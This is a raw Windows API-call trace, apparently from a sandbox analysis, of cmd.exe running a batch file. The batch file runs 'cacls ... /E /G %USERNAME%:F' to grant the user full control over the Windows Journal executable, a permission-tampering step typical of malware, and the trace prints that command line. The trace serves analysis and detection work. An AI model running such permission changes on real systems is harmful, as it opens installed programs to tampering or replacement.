[0195.878] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ac8 | out: hHeap=0x550000) returned 1 [0195.880] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0195.880] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0195.880] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0195.880] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0195.880] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0195.880] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0195.880] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0195.880] GetProcessHeap () returned 0x550000 [0195.880] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x563130 [0195.880] GetProcessHeap () returned 0x550000 [0195.880] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x72) returned 0x572b18 [0195.882] GetProcessHeap () returned 0x550000 [0195.882] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x68) returned 0x563190 [0195.883] GetConsoleTitleW (in: lpConsoleTitle=0x28f8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.884] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0195.884] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0195.884] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0195.884] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0195.884] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0195.884] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0195.884] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0195.884] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0195.884] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0195.884] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0195.884] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0195.884] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0195.884] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0195.884] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0195.885] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0195.885] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0195.885] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0195.885] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0195.885] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0195.885] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0195.885] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0195.885] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0195.885] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0195.885] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0195.885] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0195.885] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0195.885] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0195.885] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0195.885] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0195.885] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0195.885] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0195.885] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0195.885] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0195.885] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0195.885] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0195.885] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0195.885] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0195.885] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0195.885] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0195.885] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0195.885] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0195.885] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0195.885] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0195.886] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0195.886] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0195.886] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0195.886] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0195.886] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0195.886] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0195.886] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0195.886] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0195.886] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0195.886] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0195.886] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0195.886] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0195.886] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0195.886] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0195.886] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0195.886] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0195.887] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0195.887] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0195.887] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0195.887] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0195.887] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0195.887] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0195.887] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0195.887] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0195.887] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0195.887] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0195.887] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0195.887] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0195.887] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0195.888] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0195.888] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0195.888] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0195.888] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0195.888] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0195.888] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0195.888] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0195.888] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0195.888] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0195.888] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0195.888] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0195.888] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0195.888] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0195.888] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0195.888] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0195.888] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0195.888] GetProcessHeap () returned 0x550000 [0195.889] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x563200 [0195.889] GetProcessHeap () returned 0x550000 [0195.889] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd2) returned 0x563418 [0195.892] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0195.892] GetProcessHeap () returned 0x550000 [0195.892] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x418) returned 0x5507f0 [0195.892] SetErrorMode (uMode=0x0) returned 0x0 [0195.893] SetErrorMode (uMode=0x1) returned 0x0 [0195.893] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x5507f8, lpFilePart=0x28f3c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f3c8*="Desktop") returned 0x25 [0195.893] SetErrorMode (uMode=0x0) returned 0x1 [0195.893] GetProcessHeap () returned 0x550000 [0195.893] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5507f0, Size=0x6e) returned 0x5507f0 [0195.893] GetProcessHeap () returned 0x550000 [0195.893] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5507f0) returned 0x6e [0195.893] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0195.893] GetProcessHeap () returned 0x550000 [0195.893] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x5a) returned 0x5634f8 [0195.893] GetProcessHeap () returned 0x550000 [0195.893] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa8) returned 0x563560 [0195.893] GetProcessHeap () returned 0x550000 [0195.893] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x563560, Size=0x5a) returned 0x563560 [0195.893] GetProcessHeap () returned 0x550000 [0195.893] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x563560) returned 0x5a [0195.893] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.893] GetProcessHeap () returned 0x550000 [0195.893] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe0) returned 0x550868 [0195.899] GetProcessHeap () returned 0x550000 [0195.899] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x550868, Size=0x76) returned 0x550868 [0195.899] GetProcessHeap () returned 0x550000 [0195.900] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x550868) returned 0x76 [0195.900] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0195.900] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x28f164, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f164) returned 0x5635c8 [0195.900] GetProcessHeap () returned 0x550000 [0195.900] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x5617e8 [0195.900] FindClose (in: hFindFile=0x5635c8 | out: hFindFile=0x5635c8) returned 1 [0195.901] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0195.901] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0195.901] GetConsoleTitleW (in: lpConsoleTitle=0x28f63c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.901] GetProcessHeap () returned 0x550000 [0195.901] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x11c) returned 0x5508e8 [0195.901] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0195.902] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0195.902] IdentifyCodeAuthzLevelW () returned 0x1 [0195.909] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0195.909] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0195.910] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0195.910] CloseCodeAuthzLevel () returned 0x1 [0195.910] SetErrorMode (uMode=0x0) returned 0x0 [0195.910] SetErrorMode (uMode=0x1) returned 0x0 [0195.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x563208, lpFilePart=0x28f528 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x28f528*="Ch81ANBE.bat") returned 0x32 [0195.910] SetErrorMode (uMode=0x0) returned 0x1 [0195.910] GetProcessHeap () returned 0x550000 [0195.910] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x72) returned 0x572b98 [0195.911] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Journal.exe\"", _Control=" \x09") returned 0x1 [0195.911] GetProcessHeap () returned 0x550000 [0195.911] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x66) returned 0x551140 [0195.911] GetProcessHeap () returned 0x550000 [0195.911] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xc4) returned 0x5511b0 [0195.911] GetProcessHeap () returned 0x550000 [0195.911] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5511b0, Size=0x68) returned 0x5511b0 [0195.911] GetProcessHeap () returned 0x550000 [0195.911] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5511b0) returned 0x68 [0195.911] CmdBatNotification () returned 0x56326a [0195.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f56c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0195.912] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0195.912] _get_osfhandle (_FileHandle=3) returned 0x78 [0195.912] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.913] _get_osfhandle (_FileHandle=3) returned 0x78 [0195.913] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.913] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f550, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x28f550*=0xe2, lpOverlapped=0x0) returned 1 [0195.914] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0195.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0195.916] _get_osfhandle (_FileHandle=3) returned 0x78 [0195.916] GetFileType (hFile=0x78) returned 0x1 [0195.916] _get_osfhandle (_FileHandle=3) returned 0x78 [0195.916] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0195.916] GetProcessHeap () returned 0x550000 [0195.916] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x566ac8 [0195.916] GetProcessHeap () returned 0x550000 [0195.916] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x574b00 [0195.917] GetProcessHeap () returned 0x550000 [0195.917] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x565818 [0195.917] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0195.917] GetProcessHeap () returned 0x550000 [0195.917] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565818 | out: hHeap=0x550000) returned 1 [0195.917] GetProcessHeap () returned 0x550000 [0195.917] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0195.917] GetProcessHeap () returned 0x550000 [0195.917] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ac8 | out: hHeap=0x550000) returned 1 [0195.918] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0195.918] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0195.918] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0195.918] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0195.918] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0195.918] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0195.918] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0195.918] GetProcessHeap () returned 0x550000 [0195.918] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x551220 [0195.918] GetProcessHeap () returned 0x550000 [0195.918] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x563670 [0196.626] GetProcessHeap () returned 0x550000 [0196.626] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa8) returned 0x564168 [0196.627] _tell (_FileHandle=3) returned 32 [0196.627] _close (_FileHandle=3) returned 0 [0196.627] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f324 | out: _Buffer="\r\n") returned 2 [0196.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.628] GetFileType (hFile=0x7) returned 0x2 [0196.628] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0196.628] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e4 | out: lpMode=0x28f2e4) returned 1 [0196.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.629] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f310, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f310*=0x2) returned 1 [0196.629] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0196.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0196.629] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f320 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0196.630] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f320 | out: _Buffer=">") returned 1 [0196.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.630] GetFileType (hFile=0x7) returned 0x2 [0196.630] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0196.630] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f2e8 | out: lpMode=0x28f2e8) returned 1 [0196.631] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.631] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x28f314, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x28f314*=0x26) returned 1 [0196.632] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.632] GetFileType (hFile=0x7) returned 0x2 [0196.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0196.632] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f56c | out: lpMode=0x28f56c) returned 1 [0196.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.633] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x563678*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x28f598, lpReserved=0x0 | out: lpBuffer=0x563678*, lpNumberOfCharsWritten=0x28f598*=0x5) returned 1 [0196.633] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f5a4 | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Journal.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 80 [0196.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.633] GetFileType (hFile=0x7) returned 0x2 [0196.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0196.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0196.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.634] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x50, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x50) returned 1 [0196.635] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f5c4 | out: _Buffer="\r\n") returned 2 [0196.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.635] GetFileType (hFile=0x7) returned 0x2 [0196.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0196.635] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f584 | out: lpMode=0x28f584) returned 1 [0196.636] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.636] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f5b0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f5b0*=0x2) returned 1 [0196.636] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0196.637] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0196.637] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0196.637] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0196.637] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0196.637] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0196.637] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0196.637] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0196.637] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0196.637] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0196.637] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0196.637] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0196.637] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0196.637] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0196.638] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0196.638] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0196.638] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0196.638] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0196.638] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0196.638] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0196.638] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0196.638] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0196.638] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0196.638] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0196.638] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0196.638] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0196.638] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0196.638] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0196.638] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0196.639] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0196.639] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0196.639] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0196.639] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0196.639] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0196.639] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0196.639] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0196.639] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0196.639] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0196.639] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0196.639] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0196.639] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0196.639] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0196.640] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0196.640] GetProcessHeap () returned 0x550000 [0196.640] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x418) returned 0x564218 [0196.640] SetErrorMode (uMode=0x0) returned 0x0 [0196.640] SetErrorMode (uMode=0x1) returned 0x0 [0196.640] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x564220, lpFilePart=0x28f368 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f368*="Desktop") returned 0x25 [0196.640] SetErrorMode (uMode=0x0) returned 0x1 [0196.641] GetProcessHeap () returned 0x550000 [0196.641] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x564218, Size=0x60) returned 0x564218 [0196.641] GetProcessHeap () returned 0x550000 [0196.641] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x564218) returned 0x60 [0196.641] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.641] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.641] GetProcessHeap () returned 0x550000 [0196.641] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x120) returned 0x564280 [0196.641] GetProcessHeap () returned 0x550000 [0196.641] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x238) returned 0x5643a8 [0196.646] GetConsoleTitleW (in: lpConsoleTitle=0x28f134, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.646] GetConsoleTitleW (in: lpConsoleTitle=0x28eec8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.646] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ed50, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ee18 | out: lpAttributeList=0x28ed50, lpSize=0x28ee18) returned 1 [0196.647] UpdateProcThreadAttribute (in: lpAttributeList=0x28ed50, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ee10, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ed50, lpPreviousValue=0x0) returned 1 [0196.647] GetStartupInfoW (in: lpStartupInfo=0x28ed0c | out: lpStartupInfo=0x28ed0c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0196.664] CloseHandle (hObject=0x78) returned 1 [0196.664] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.664] GetProcessHeap () returned 0x550000 [0196.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565f88 | out: hHeap=0x550000) returned 1 [0196.664] GetEnvironmentStringsW () returned 0x565f88* [0196.664] GetProcessHeap () returned 0x550000 